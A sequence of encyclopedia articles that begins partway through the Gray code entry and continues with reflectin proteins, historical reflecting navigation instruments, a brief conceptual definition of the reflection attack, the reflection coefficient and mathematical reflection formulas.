Monotonic codes have an interesting connection to the Lovász conjecture , which states that every connected vertex-transitive graph contains a Hamiltonian path. The "middle-level" subgraph Q 2 n + 1 ( n ) {\displaystyle Q_{2n+1}(n)} is vertex-transitive (that is, its automorphism group is transitive, so that each vertex has the same "local environment" and cannot be differentiated from the others, since we can relabel the coordinates as well as the binary digits to obtain an automorphism ) and the problem of finding a Hamiltonian path in this subgraph is called the "middle-levels problem", which can provide insights into the more general conjecture. The question has been answered affirmatively for n ≤ 15 {\displaystyle n\leq 15} , and the preceding construction for monotonic codes ensures a Hamiltonian path of length at least 0.839 N , where N is the number of vertices in the middle-level subgraph. [ 70 ]
Another type of Gray code, the Beckett–Gray code , is named for Irish playwright Samuel Beckett , who was interested in symmetry . His play " Quad " features four actors and is divided into sixteen time periods. Each period ends with one of the four actors entering or leaving the stage. The play begins and ends with an empty stage, and Beckett wanted each subset of actors to appear on stage exactly once. [ 71 ] Clearly the set of actors currently on stage can be represented by a 4-bit binary Gray code. Beckett, however, placed an additional restriction on the script: he wished the actors to enter and exit so that the actor who had been on stage the longest would always be the one to exit. The actors could then be represented by a first in, first out queue , so that (of the actors onstage) the actor being dequeued is always the one who was enqueued first. [ 71 ] Beckett was unable to find a Beckett–Gray code for his play, and indeed, an exhaustive listing of all possible sequences reveals that no such code exists for n = 4. It is known today that such codes do exist for n = 2, 5, 6, 7, and 8, and do not exist for n = 3 or 4. An example of an 8-bit Beckett–Gray code can be found in Donald Knuth 's Art of Computer Programming . [ 13 ] According to Sawada and Wong, the search space for n = 6 can be explored in 15 hours, and more than 9500 solutions for the case n = 7 have been found. [ 72 ]
Snake-in-the-box codes, or snakes , are the sequences of nodes of induced paths in an n -dimensional hypercube graph , and coil-in-the-box codes, [ 73 ] or coils , are the sequences of nodes of induced cycles in a hypercube. Viewed as Gray codes, these sequences have the property of being able to detect any single-bit coding error. Codes of this type were first described by William H. Kautz in the late 1950s; [ 5 ] since then, there has been much research on finding the code with the largest possible number of codewords for a given hypercube dimension.
Yet another kind of Gray code is the single-track Gray code (STGC) developed by Norman B. Spedding [ 74 ] [ 75 ] and refined by Hiltgen, Paterson and Brandestini in Single-track Gray Codes (1996). [ 76 ] [ 77 ] The STGC is a cyclical list of P unique binary encodings of length n such that two consecutive words differ in exactly one position, and when the list is examined as a P × n matrix , each column is a cyclic shift of the first column. [ 78 ]
The name comes from their use with rotary encoders , where a number of tracks are being sensed by contacts, resulting for each in an output of 0 or 1 . To reduce noise due to different contacts not switching at exactly the same moment in time, one preferably sets up the tracks so that the data output by the contacts are in Gray code. To get high angular accuracy, one needs lots of contacts; in order to achieve at least 1° accuracy, one needs at least 360 distinct positions per revolution, which requires a minimum of 9 bits of data, and thus the same number of contacts.
If all contacts are placed at the same angular position, then 9 tracks are needed to get a standard BRGC with at least 1° accuracy. However, if the manufacturer moves a contact to a different angular position (but at the same distance from the center shaft), then the corresponding "ring pattern" needs to be rotated the same angle to give the same output. If the most significant bit (the inner ring in Figure 1) is rotated enough, it exactly matches the next ring out. Since both rings are then identical, the inner ring can be cut out, and the sensor for that ring moved to the remaining, identical ring (but offset at that angle from the other sensor on that ring). Those two sensors on a single ring make a quadrature encoder. That reduces the number of tracks for a "1° resolution" angular encoder to 8 tracks. Reducing the number of tracks still further cannot be done with BRGC.
For many years, Torsten Sillke [ 79 ] and other mathematicians believed that it was impossible to encode position on a single track such that consecutive positions differed at only a single sensor, except for the 2-sensor, 1-track quadrature encoder. So for applications where 8 tracks were too bulky, people used single-track incremental encoders (quadrature encoders) or 2-track "quadrature encoder + reference notch" encoders.
Norman B. Spedding, however, registered a patent in 1994 with several examples showing that it was possible. [ 74 ] Although it is not possible to distinguish 2 n positions with n sensors on a single track, it is possible to distinguish close to that many. Etzion and Paterson conjecture that when n is itself a power of 2, n sensors can distinguish at most 2 n − 2 n positions and that for prime n the limit is 2 n − 2 positions. [ 80 ] The authors went on to generate a 504-position single track code of length 9 which they believe is optimal. Since this number is larger than 2 8 = 256, more than 8 sensors are required by any code, although a BRGC could distinguish 512 positions with 9 sensors.
An STGC for P = 30 and n = 5 is reproduced here:
Each column is a cyclic shift of the first column, and from any row to the next row only one bit changes. [ 81 ] The single-track nature (like a code chain) is useful in the fabrication of these wheels (compared to BRGC), as only one track is needed, thus reducing their cost and size.
The Gray code nature is useful (compared to chain codes , also called De Bruijn sequences ), as only one sensor will change at any one time, so the uncertainty during a transition between two discrete states will only be plus or minus one unit of angular measurement the device is capable of resolving. [ 82 ]
Since this 30 degree example was added, there has been a lot of interest in examples with higher angular resolution. In 2008, Gary Williams, [ 83 ] [ user-generated source? ] based on previous work, [ 80 ] discovered a 9-bit single track Gray code that gives a 1 degree resolution. This Gray code was used to design an actual device which was published on the site Thingiverse . This device [ 84 ] was designed by etzenseep (Florian Bauer) in September 2022.
An STGC for P = 360 and n = 9 is reproduced here:
Two-dimensional Gray codes are used in communication to minimize the number of bit errors in quadrature amplitude modulation (QAM) adjacent points in the constellation . In a typical encoding the horizontal and vertical adjacent constellation points differ by a single bit, and diagonal adjacent points differ by 2 bits. [ 85 ]
Two-dimensional Gray codes also have uses in location identifications schemes, where the code would be applied to area maps such as a Mercator projection of the earth's surface and an appropriate cyclic two-dimensional distance function such as the Mannheim metric be used to calculate the distance between two encoded locations, thereby combining the characteristics of the Hamming distance with the cyclic continuation of a Mercator projection. [ 86 ]
If a subsection of a specific codevalue is extracted from that value, for example the last 3 bits of a 4-bit Gray code, the resulting code will be an "excess Gray code". This code shows the property of counting backwards in those extracted bits if the original value is further increased. Reason for this is that Gray-encoded values do not show the behaviour of overflow, known from classic binary encoding, when increasing past the "highest" value.
Example: The highest 3-bit Gray code, 7, is encoded as (0)100. Adding 1 results in number 8, encoded in Gray as 1100. The last 3 bits do not overflow and count backwards if you further increase the original 4 bit code.
When working with sensors that output multiple, Gray-encoded values in a serial fashion, one should therefore pay attention whether the sensor produces those multiple values encoded in 1 single Gray code or as separate ones, as otherwise the values might appear to be counting backwards when an "overflow" is expected.
The bijective mapping { 0 ↔ 00 , 1 ↔ 01 , 2 ↔ 11 , 3 ↔ 10 } establishes an isometry between the metric space over the finite field Z 2 2 {\displaystyle \mathbb {Z} _{2}^{2}} with the metric given by the Hamming distance and the metric space over the finite ring Z 4 {\displaystyle \mathbb {Z} _{4}} (the usual modular arithmetic ) with the metric given by the Lee distance . The mapping is suitably extended to an isometry of the Hamming spaces Z 2 2 m {\displaystyle \mathbb {Z} _{2}^{2m}} and Z 4 m {\displaystyle \mathbb {Z} _{4}^{m}} . Its importance lies in establishing a correspondence between various "good" but not necessarily linear codes as Gray-map images in Z 2 2 {\displaystyle \mathbb {Z} _{2}^{2}} of ring-linear codes from Z 4 {\displaystyle \mathbb {Z} _{4}} . [ 87 ] [ 88 ]
There are a number of binary codes similar to Gray codes, including:
The following binary-coded decimal (BCD) codes are Gray code variants as well: | https://en.wikipedia.org/wiki/Reflected_binary_code |
Reflectins are a family of intrinsically disordered proteins evolved by a certain number of cephalopods including Euprymna scolopes and Doryteuthis opalescens to produce iridescent camouflage and signaling. The recently identified protein family is enriched in aromatic and sulfur -containing amino acids , and is utilized by certain cephalopods to refract incident light in their environment. [ 1 ] The reflectin protein is responsible for dynamic pigmentation and iridescence in organisms. This process is "dynamic" due to its reversible properties, allowing reflectin to change an organism's appearance in response to external factors such as needing to camouflage or send warning signals.
Reflectin proteins are likely distributed in the outer layer of cells called "sheath cells" that surround an organism's pigment cells also known as chromatocyte. [ 2 ] Specific sequences of reflectin ables cephalopods to communicate and camouflage by adjusting color and reflectivity. [ 3 ]
Reflectin is presumed to have originated from a type of transposon (nicknamed jumping genes ), which is a DNA sequence that can change positions within genetic material by encoding an enzyme . The encoded enzyme detaches transposon from one location in a genome and ligates (binds) it to another. "Jumps" of transposon can create or reverse mutations that alter a cell's genetic identity which can result in new characteristics. This process can be thought of as a "cut and paste" mechanism. Transposons' ability to adapt in a genome and quickly shift its identity is a property that closely resemble the behavior of reflectin.
An additional ancestor could be symbiotic Vibrio fischeri (also called Aliivibrio fischeri) which is a bioluminescent (produces and emits light) bacterium often found in symbiotic relationships. As reflectin and Vibrio fischeri share similar functions such as producing an iridescent appearance in organisms, it is also thought that, just like Vibrio fischeri, Reflectin is symbiotic and is used by cephalopods to interact with their environment. [ 4 ] [ 5 ]
Reflectin is a disordered protein made up of conserved amino acid sequences. Each sequence includes a combination of standard and sulphur-containing amino acids. Although the basic structure can be deduced, the exact molecular structure is yet to be determined. Light interacting properties of reflectin can be attributed to its ordered hierarchical structure and hydrogen bonding . [ 6 ] [ 7 ] [ 8 ]
Reflectin make up the majority of Bragg reflectors which are formed by invaginations of the cell membrane. Bragg reflectors are responsible for reflecting color in a type of skin cell called iridocyte . Reflectors are composed of periodically stacked lamellae which are thin layers of tissue bound to a membrane. The color and brightness of light reflected by many species is determined by the thickness, spacing, and refractive index (how fast light can travel through the membrane) of the Bragg lamellae. [ 9 ] A change in membrane thickness triggers an outflow of water from the Bragg lamellae, essentially dehydrating it, increasing their refractive index and decreasing thickness and spacing. This results in an increase in reflectance from the Bragg lamellae, and a change in color of the reflected light. This change additionally allows initially transparent cells to increase in brightness [ 8 ]
Reflectin is able to receive information from signals for a continuous process to fine-tune the osmotic pressure of sub-cellular structures of cephlapods. This ongoing process is used to regulate photonic behavior, or in other words, control how an organism changes color. The components of reflectin carry a very strong positive charge. Nerve signals are sent to iridophore cells (also called chromatophores) which are pigment-containing cells that add a negative charge to reflectin. With the charges balanced, the protein folds up to expose a sticky surface, causing reflecting molecules to clump together. This process repeats until enough reflectin proteins have accumulated to change the fluid pressure of the membrane of the cell walls. The thickness of the membrane reduces as water escapes, a process that changes the wavelength of light reflected. [ 2 ] By adapting an organism's membrane to reflect different wavelengths, reflection allows cephlapods to shift from different colors of red, yellow, green, and blue as well as adjust the brightness of the projected color. [ 10 ] [ 11 ] [ 12 ] [ 13 ]
Reflectins have been heterologously expressed in mammalian cells to change their refractive index . [ 17 ] | https://en.wikipedia.org/wiki/Reflectin |
Reflecting instruments are those that use mirrors to enhance their ability to make measurements. In particular, the use of mirrors permits one to observe two objects simultaneously while measuring the angular distance between the objects. While reflecting instruments are used in many professions, they are primarily associated with celestial navigation as the need to solve navigation problems, in particular the problem of the longitude , was the primary motivation in their development.
The purpose of reflecting instruments is to allow an observer to measure the altitude of a celestial object or the angular distance between two objects. The driving force behind the developments discussed here was the solution to the problem of finding one's longitude at sea. The solution to this problem was seen to require an accurate means of measuring angles and the accuracy was seen to rely on the observer's ability to measure this angle by simultaneously observing two objects.
The deficiency of prior instruments was well known. Requiring the observer to observe two objects with two divergent lines of sight increased the likelihood of an error. Those that considered the problem realized that the use of specula (mirrors in modern parlance) could permit two objects to be observed in a single view. What followed is a series of inventions and improvements that refined the instrument to the point that its accuracy exceeded that which was required for determining longitude. Any further improvements required a completely new technology.
Some of the early reflecting instruments were proposed by scientists such as Robert Hooke and Isaac Newton . These were little used or may not have been built or tested extensively. The van Breen instrument was the exception, in that it was used by the Dutch. However, it had little influence outside of the Netherlands .
Invented in 1660 by the Dutch Joost van Breen, the spiegelboog (mirror-bow) was a reflecting cross staff . This instrument appears to have been used for approximately 100 years, mainly in the Zeeland Chamber of the VOC (The Dutch East India Company ). [ 1 ]
Hooke's instrument was a single-reflecting instrument. It used a single mirror to reflect the image of an astronomical object to the observer's eye. [ 2 ] This instrument was first described in 1666 and a working model was presented by Hooke at a meeting of the Royal Society some time later.
The device consisted of three primary components, an index arm, a radial arm and a graduated chord. The three were arranged in a triangle as in the image on the right. A telescopic sight was mounted on the index arm. At the point of rotation of the radial arm, a single mirror was mounted. This point of rotation allowed the angle between the index arm and the radial arm to be changed. The graduated chord was connected to the opposite end of the radial arm and the chord was permitted to rotate about the end. The chord was held against the distant end of the index arm and slid against it. The graduations on the chord were uniform and, by using it to measure the distance between the ends of the index arm and the radial arm, the angle between those arms could be determined. A table of chords was used to convert a measurement of distance to a measurement of angle. The use of the mirror resulted in the measured angle being twice the angle included by the index and the radius arm.
The mirror on the radial arm was small enough that the observer could see the reflection of an object in half the telescope's view while seeing straight ahead in the other half. This allowed the observer to see both objects at once. Aligning the two objects together in the telescopes view resulted in the angular distance between them to be represented on the graduated chord.
While Hooke's instrument was novel and attracted some attention at the time, there is no evidence that it was subjected to any tests at sea. [ 2 ] The instrument was little used and did not have any significant effect on astronomy or navigation.
In 1692, Edmond Halley presented the design of a reflecting instrument to the Royal Society. [ 2 ]
This is an interesting instrument, combining the functionality of a radio latino with a double telescope . The telescope (AB in the adjacent image), has an eyepiece at one end and a mirror (D) partway along its length with one objective lens at the far end (B). The mirror only obstructs half the field (either left or right) and permits the objective to be seen on the other. Reflected in the mirror is the image from the second objective lens (C). This permits the observer to see both images, one straight through and one reflected, simultaneously besides each other. It is essential that the focal lengths of the two objective lenses be the same and that the distances from the mirror to either lens be identical. If this condition is not met, the two images cannot be brought to a common focus .
The mirror is mounted on the staff (DF) of the radio latino portion of the instrument and rotates with it. The angle this side of the radio latino's rhombus makes to the telescope can be set by adjusting the rhombus' diagonal length. In order to facilitate this and allow for fine adjustment of the angle, a screw (EC) is mounted so as to allow the observer to change the distance between the two vertexes (E and C).
The observer sights the horizon with the direct lens' view and sights a celestial object in the mirror. Turning the screw to bring the two images directly adjacent sets the instrument. The angle is determined by taking the length of the screw between E and C and converting this to an angle in a table of chords .
Halley specified that the telescope tube be rectangular in cross section. This makes construction easy, but is not a requirement as other cross section shapes can be accommodated. The four sides of the radio latino portion (CD, DE, EF, FC) must be equal in length in order for the angle between the telescope and the objective lens side (ADC) to be precisely twice the angle between the telescope and the mirror (ADF) (or in other words – to enforce the angle of incidence being equal to the angle of reflection ). Otherwise, instrument collimation will be compromised and the resulting measurements would be in error.
The celestial object's elevation angle could have been determined by reading from graduations on the staff at the slider, however, that's not how Halley designed the instrument. This may suggest that the overall design of the instrument was coincidentally like a radio latino and that Halley may not have been familiar with that instrument.
There is no knowledge of whether this instrument was ever tested at sea. [ 2 ]
Newton's reflecting quadrant was similar in many respects to Hadley's first reflecting quadrant that followed it.
Newton had communicated the design to Edmund Halley around 1699. However, Halley did not do anything with the document and it remained in his papers only to be discovered after his death. [ 3 ] However, Halley did discuss Newton's design with members of the Royal Society when Hadley presented his reflecting quadrant in 1731. Halley noted that Hadley's design was quite similar to the earlier Newtonian instrument. [ 2 ]
As a result of this inadvertent secrecy, Newton's invention played little role in the development of reflecting instruments.
What is remarkable about the octant is the number of persons who independently invented the device in a short period of time. John Hadley and Thomas Godfrey both get credit for inventing the octant . They independently developed the same instrument around 1731. They were not the only ones, however.
In Hadley's case, two instruments were designed. The first was an instrument very similar to Newton's reflecting quadrant. The second had essentially the same form as the modern sextant. Few of the first design were constructed, while the second became the standard instrument from which the sextant derived and, along with the sextant, displaced all prior navigation instruments used for celestial navigation .
Caleb Smith, an English insurance broker with a strong interest in astronomy, had created an octant in 1734. He called it an Astroscope or Sea-Quadrant . [ 4 ] He used a fixed prism in addition to an index mirror to provide reflective elements. Prisms provide advantages over mirrors in an era when polished speculum metal mirrors were inferior and both the silvering of a mirror and the production of glass with flat, parallel surfaces was difficult. However, the other design elements of Smith's instrument made it inferior to Hadley's octant and it was not used significantly. [ 3 ]
Jean-Paul Fouchy, a mathematics professor and astronomer in France , invented an octant in 1732. [ 3 ] His was essentially the same as Hadley's. Fouchy did not know of the developments in England at the time, since communications between the two country's instrument makers was limited and the publications of the Royal Society , particularly the Philosophical Transactions , were not being distributed in France. [ 5 ] Fouchy's octant was overshadowed by Hadley's.
The origin of the sextant is straightforward and not in dispute. Admiral John Campbell , having used Hadley's octant in sea trials of the method of lunar distances , found that it was wanting. The 90° angle subtended by the arc of the instrument was insufficient to measure some of the angular distances required for the method. He suggested that the angle be increased to 120°, yielding the sextant. John Bird made the first such sextant in 1757. [ 6 ]
With the development of the sextant, the octant became something of a second class instrument. The octant, while occasionally constructed entirely of brass, remained primarily a wooden-framed instrument. Most of the developments in advanced materials and construction techniques were reserved for the sextant.
There are examples of sextants made with wood, however most are made from brass. In order to ensure the frame was stiff, instrument makers used thicker frames. This had a drawback in making the instrument heavier, which could influence the accuracy due to hand-shaking as the navigator worked against its weight. In order to avoid this problem, the frames were modified. Edward Troughton patented the double-framed sextant in 1788. [ 7 ] This used two frames held in parallel with spacers. The two frames were about a centimetre apart. This significantly increased the stiffness of the frame. An earlier version had a second frame that only covered the upper part of the instrument, securing the mirrors and telescope. Later versions used two full frames. Since the spacers looked like little pillars, these were also called pillar sextants .
Troughton also experimented with alternative materials. The scales were plated with silver , gold or platinum . Gold and platinum both minimized corrosion problems. The platinum-plated instruments were expensive, due to the scarcity of the metal, though less expensive than gold. Troughton knew William Hyde Wollaston through the Royal Society and this gave him access to the precious metal. [ 8 ] Instruments from Troughton's company that used platinum can be easily identified by the word Platina engraved on the frame. These instruments remain highly valued as collector's items and are as accurate today as when they were constructed. [ 9 ]
As the developments in dividing engines progressed, the sextant was more accurate and could be made smaller. In order to permit easy reading of the vernier , a small magnifying lens was added. In addition, to reduce glare on the frame, some had a diffuser surrounding the magnifier to soften the light. As accuracy increased, the circular arc vernier was replaced with a drum vernier.
Frame designs were modified over time to create a frame that would not be adversely affected by temperature changes. These frame patterns became standardized and one can see the same general shape in many instruments from many different manufacturers.
In order to control costs, modern sextants are now available in precision-made plastic. These are light, affordable and of high quality.
While most people think of navigation when they hear the term sextant , the instrument has been used in other professions.
In addition to these types, there are terms used for various sextants.
A pillar sextant can be either:
The former is the most common use of the term.
Several makers offered instruments with sizes other than one-eighth or one-sixth of a circle. One of the most common was the quintant or fifth of a circle (72° arc reading to 144°). Other sizes were also available, but the odd sizes never became common. Many instruments are found with scales reading to, for example, 135°, but they are simply referred to as sextants. Similarly, there are 100° octants, but these are not separated as unique types of instruments.
There was interest in much larger instruments for special purposes. In particular a number of full circle instruments were made, categorized as reflecting circles and repeating circles .
The reflecting circle was invented by the German geometer and astronomer Tobias Mayer in 1752, [ 6 ] with details published in 1767. [ 3 ] His development preceded the sextant and was motivated by the need to create a superior surveying instrument. [ 3 ]
The reflecting circle is a complete circular instrument graduated to 720° (to measure distances between heavenly bodies, there is no need to read an angle greater than 180°, since the minimum distance will always be less than 180°). Mayer presented a detailed description of this instrument to the Board of Longitude and John Bird used the information to construct one sixteen inches in diameter for evaluation by the Royal Navy. [ 11 ] This instrument was one of those used by Admiral John Campbell during his evaluation of the lunar distance method . It differed in that it was graduated to 360° and was so heavy that it was fitted with a support that attached to a belt. [ 11 ] It was not considered better than the Hadley octant and was less convenient to use. [ 3 ] As a result, Campbell recommended the construction of the sextant.
Jean-Charles de Borda further developed the reflecting circle. He modified the position of the telescopic sight in such a way that the mirror could be used to receive an image from either side relative to the telescope. This eliminated the need to ascertain that the mirrors were precisely parallel when reading zero. This simplified the use of the instrument. Further refinements were performed with the help of Etienne Lenoir . The two of them refined the instrument to its definitive form in 1777. [ 3 ] This instrument was so distinctive it was given the name Borda circle or repeating circle . [ 6 ] [ 12 ] Borda and Lenoir developed the instrument for geodetic surveying . Since it was not used for the celestial measures, it did not use double reflection and substituted two telescope sights. As such, it was not a reflecting instrument. It was notable as being the equal of the great theodolite created by the renowned instrument maker, Jesse Ramsden .
Josef de Mendoza y Ríos redesigned Borda's reflecting circle (London, 1801). The goal was to use it together with his Lunar Tables published by the Royal Society (London, 1805). He made a design with two concentric circles and a vernier scale and recommended averaging three sequential readings to reduce the error. Borda's system was not based on a circle of 360° but 400 grads (Borda spent years calculating his tables with a circle divided in 400°). Mendoza's lunar tables have been used through almost the entire nineteenth century (see Lunar distance (navigation) ).
Edward Troughton also modified the reflecting circle. He created a design with three index arms and verniers . This permitted three simultaneous readings to average out the error.
As a navigation instrument, the reflecting circle was more popular with the French navy than with the British. [ 6 ]
The Bris sextant is not a true sextant, but it is a true reflecting instrument based on the principle of double reflection and subject to the same rules and errors as common octants and sextants. Unlike common octants and sextants, the Bris sextant is a fixed angle instrument capable of accurately measuring a few specific angles unlike other reflecting instruments which can measure any angle within the range of the instrument. It is particularly suited to determining the altitude of the sun or moon .
Francis Ronalds invented an instrument for recording angles in 1829 by modifying the octant. A disadvantage of reflecting instruments in surveying applications is that optics dictate that the mirror and index arm rotate through half the angular separation of the two objects. The angle thus needs to be read, noted and a protractor employed to draw the angle on a plan. Ronalds' idea was to configure the index arm to rotate through twice the angle of the mirror, so that the arm could then be used to draw a line at the correct angle directly onto the drawing. He used a sector as the basis of his instrument and placed the horizon glass at one tip and the index mirror near the hinge connecting the two rulers. The two revolving elements were linked mechanically and the barrel supporting the mirror was twice the diameter of the hinge to give the required angular ratio. [ 13 ] | https://en.wikipedia.org/wiki/Reflecting_instrument |
In computer security , a reflection attack is a method of attacking a challenge–response authentication system that uses the same protocol in both directions. That is, the same challenge–response protocol is used by each side to authenticate the other side. The essential idea of the attack is to trick the target into providing the answer to its own challenge. [ 1 ]
The general attack outline is as follows:
If the authentication protocol is not carefully designed, the target will accept that response as valid, thereby leaving the attacker with one fully authenticated channel connection (the other one is simply abandoned).
Some of the most common solutions to this attack are described below: | https://en.wikipedia.org/wiki/Reflection_attack |
In physics and electrical engineering the reflection coefficient is a parameter that describes how much of a wave is reflected by an impedance discontinuity in the transmission medium. It is equal to the ratio of the amplitude of the reflected wave to the incident wave, with each expressed as phasors . For example, it is used in optics to calculate the amount of light that is reflected from a surface with a different index of refraction, such as a glass surface, or in an electrical transmission line to calculate how much of the electromagnetic wave is reflected by an impedance discontinuity. The reflection coefficient is closely related to the transmission coefficient . The reflectance of a system is also sometimes called a reflection coefficient.
Different disciplines have different applications for the term.
In telecommunications and transmission line theory, the reflection coefficient is the ratio of the complex amplitude of the reflected wave to that of the incident wave. The voltage and current at any point along a transmission line can always be resolved into forward and reflected traveling waves given a specified reference impedance Z 0 . The reference impedance used is typically the characteristic impedance of a transmission line that's involved, but one can speak of reflection coefficient without any actual transmission line being present. In terms of the forward and reflected waves determined by the voltage and current, the reflection coefficient is defined as the complex ratio of the voltage of the reflected wave ( V − {\displaystyle V^{-}} ) to that of the incident wave ( V + {\displaystyle V^{+}} ). This is typically represented with a Γ {\displaystyle \Gamma } (capital gamma ) and can be written as:
It can also be defined using the currents associated with the reflected and forward waves, but introducing a minus sign to account for the opposite orientations of the two currents:
The reflection coefficient may also be established using other field or circuit pairs of quantities whose product defines power resolvable into a forward and reverse wave. With electromagnetic plane waves, one uses the ratio of the electric fields of the reflected to that of the incident wave (or magnetic fields, again with a minus sign); the ratio of each wave's electric field E to its magnetic field H is the medium's characteristic impedance, Z 0 {\displaystyle Z_{0}} , (equal to the impedance of free space if the medium is a vacuum). [ 1 ]
In the accompanying figure, a signal source with internal impedance Z S {\displaystyle Z_{S}} possibly followed by a transmission line of characteristic impedance Z S {\displaystyle Z_{S}} is represented by its Thévenin equivalent , driving the load Z L {\displaystyle Z_{L}} . For a real (resistive) source impedance Z S {\displaystyle Z_{S}} , if we define Γ {\displaystyle \Gamma } using the reference impedance Z 0 = Z S {\displaystyle Z_{0}=Z_{S}} then the source's maximum power is delivered to a load Z L = Z 0 {\displaystyle Z_{L}=Z_{0}} , in which case Γ = 0 {\displaystyle \Gamma =0} implying no reflected power. More generally, the squared-magnitude of the reflection coefficient | Γ | 2 {\displaystyle |\Gamma |^{2}} denotes the proportion of that power that is reflected back to the source, with the power actually delivered toward the load being 1 − | Γ | 2 {\displaystyle 1-|\Gamma |^{2}} .
Anywhere along an intervening (lossless) transmission line of characteristic impedance Z 0 {\displaystyle Z_{0}} , the magnitude of the reflection coefficient | Γ | {\displaystyle |\Gamma |} will remain the same (the powers of the forward and reflected waves stay the same) but with a different phase. In the case of a short circuited load ( Z L = 0 {\displaystyle Z_{L}=0} ), one finds Γ = − 1 {\displaystyle \Gamma =-1} at the load. This implies the reflected wave having a 180° phase shift (phase reversal) with the voltages of the two waves being opposite at that point and adding to zero (as a short circuit demands).
The reflection coefficient is determined by the load impedance at the end of the transmission line, as well as the characteristic impedance of the line. A load impedance of Z L {\displaystyle Z_{L}} terminating a line with a characteristic impedance of Z 0 {\displaystyle Z_{0}\,} will have a reflection coefficient of
This is the coefficient at the load. The reflection coefficient can also be measured at other points on the line. The magnitude of the reflection coefficient in a lossless transmission line is constant along the line (as are the powers in the forward and reflected waves). However its phase will be shifted by an amount dependent on the electrical distance ϕ {\displaystyle \phi } from the load. If the coefficient is measured at a point L {\displaystyle L} meters from the load, so the electrical distance from the load is ϕ = 2 π L / λ {\displaystyle \phi =2\pi L/\lambda } radians, the coefficient Γ ′ {\displaystyle \Gamma '} at that point will be
Note that the phase of the reflection coefficient is changed by twice the phase length of the attached transmission line. That is to take into account not only the phase delay of the reflected wave, but the phase shift that had first been applied to the forward wave, with the reflection coefficient being the quotient of these. The reflection coefficient so measured, Γ ′ {\displaystyle \Gamma '} , corresponds to an impedance which is generally dissimilar to Z L {\displaystyle Z_{L}} present at the far side of the transmission line.
The complex reflection coefficient (in the region | Γ | ≤ 1 {\displaystyle |\Gamma |\leq 1} , corresponding to passive loads) may be displayed graphically using a Smith chart . The Smith chart is a polar plot of Γ {\displaystyle \Gamma } , therefore the magnitude of Γ {\displaystyle \Gamma } is given directly by the distance of a point to the center (with the edge of the Smith chart corresponding to | Γ | = 1 {\displaystyle |\Gamma |=1} ). Its evolution along a transmission line is likewise described by a rotation of 2 ϕ {\displaystyle 2\phi } around the chart's center. Using the scales on a Smith chart, the resulting impedance (normalized to Z 0 {\displaystyle Z_{0}} ) can directly be read. Before the advent of modern electronic computers, the Smith chart was of particular use as a sort of analog computer for this purpose.
The standing wave ratio (SWR) is determined solely by the magnitude of the reflection coefficient:
Along a lossless transmission line of characteristic impedance Z 0 , the SWR signifies the ratio of the voltage (or current) maxima to minima (or what it would be if the transmission line were long enough to produce them). The above calculation assumes that Γ {\displaystyle \Gamma } has been calculated using Z 0 as the reference impedance. Since it uses only the magnitude of Γ {\displaystyle \Gamma } , the SWR intentionally ignores the specific value of the load impedance Z L responsible for it, but only the magnitude of the resulting impedance mismatch . That SWR remains the same wherever measured along a transmission line (looking towards the load) since the addition of a transmission line length to a load Z L {\displaystyle Z_{L}} only changes the phase, not magnitude of Γ {\displaystyle \Gamma } . While having a one-to-one correspondence with reflection coefficient, SWR is the most commonly used figure of merit in describing the mismatch affecting a radio antenna or antenna system. It is most often measured at the transmitter side of a transmission line, but having, as explained, the same value as would be measured at the antenna (load) itself.
A transmission line is an example of a 2-port electrical network , but reflection coefficents are useful in the analysis of any electrical networks. A reflection coefficent for each port in the same way as for the boundary of a transmission line. It will, however, also depend on the porperties of connections at other ports and so is not a property intrinsic to the network itself. For a 2-port network with the 2x2 scattering matrix S , and with a source and load connected to its input and output, where the reflections off the source back into the input are Γ S {\displaystyle \Gamma _{S}} and the reflections off the load back into the output are Γ L {\displaystyle \Gamma _{L}} , then the relfection coefficients at the input and output are given by: [ 2 ]
Reflection coefficient is used in feeder testing for reliability of medium.
In optics and electromagnetics in general, reflection coefficient can refer to either the amplitude reflection coefficient described here, or the reflectance , depending on context. Typically, the reflectance is represented by a capital R , while the amplitude reflection coefficient is represented by a lower-case r . These related concepts are covered by Fresnel equations in classical optics .
Acousticians use reflection coefficients to understand the effect of different materials on their acoustic environments. The field properties used to define the reflection coefficent are typically the acoustic pressure and velocity in the incident and reflected acoustic waves. | https://en.wikipedia.org/wiki/Reflection_coefficient |
In mathematics , a reflection formula or reflection relation for a function f is a relationship between f ( a − x ) and f ( x ) . It is a special case of a functional equation . It is common in mathematical literature to use the term "functional equation" for what are specifically reflection formulae.
Reflection formulae are useful for numerical computation of special functions . In effect, an approximation that has greater accuracy or only converges on one side of a reflection point (typically in the positive half of the complex plane ) can be employed for all arguments.
The even and odd functions satisfy by definition simple reflection relations around a = 0 . For all even functions,
f ( − x ) = f ( x ) , {\displaystyle f(-x)=f(x),}
and for all odd functions,
f ( − x ) = − f ( x ) . {\displaystyle f(-x)=-f(x).}
A famous relationship is Euler's reflection formula
Γ ( z ) Γ ( 1 − z ) = π sin ( π z ) , z ∉ Z {\displaystyle \Gamma (z)\Gamma (1-z)={\frac {\pi }{\sin {(\pi z)}}},\qquad z\not \in \mathbb {Z} }
for the gamma function Γ ( z ) {\textstyle \Gamma (z)} , due to Leonhard Euler .
There is also a reflection formula for the general n -th order polygamma function ψ ( n ) ( z ) ,
ψ ( n ) ( 1 − z ) + ( − 1 ) n + 1 ψ ( n ) ( z ) = ( − 1 ) n π d n d z n cot ( π z ) {\displaystyle \psi ^{(n)}(1-z)+(-1)^{n+1}\psi ^{(n)}(z)=(-1)^{n}\pi {\frac {d^{n}}{dz^{n}}}\cot {(\pi z)}}
which springs trivially from the fact that the polygamma functions are defined as the derivatives of ln Γ {\textstyle \ln \Gamma } and thus inherit the reflection formula.
The dilogarithm also satisfies a reflection formula, [ 1 ] [ 2 ]
Li 2 ( z ) + Li 2 ( 1 − z ) = ζ ( 2 ) − ln ( z ) ln ( 1 − z ) {\displaystyle \operatorname {Li} _{2}(z)+\operatorname {Li} _{2}(1-z)=\zeta (2)-\ln(z)\ln(1-z)}
The Riemann zeta function ζ ( z ) satisfies
ζ ( 1 − z ) ζ ( z ) = 2 Γ ( z ) ( 2 π ) z cos ( π z 2 ) , {\displaystyle {\frac {\zeta (1-z)}{\zeta (z)}}={\frac {2\,\Gamma (z)}{(2\pi )^{z}}}\cos \left({\frac {\pi z}{2}}\right),}
and the Riemann Xi function ξ ( z ) satisfies
ξ ( z ) = ξ ( 1 − z ) . {\displaystyle \xi (z)=\xi (1-z).} | https://en.wikipedia.org/wiki/Reflection_formula |
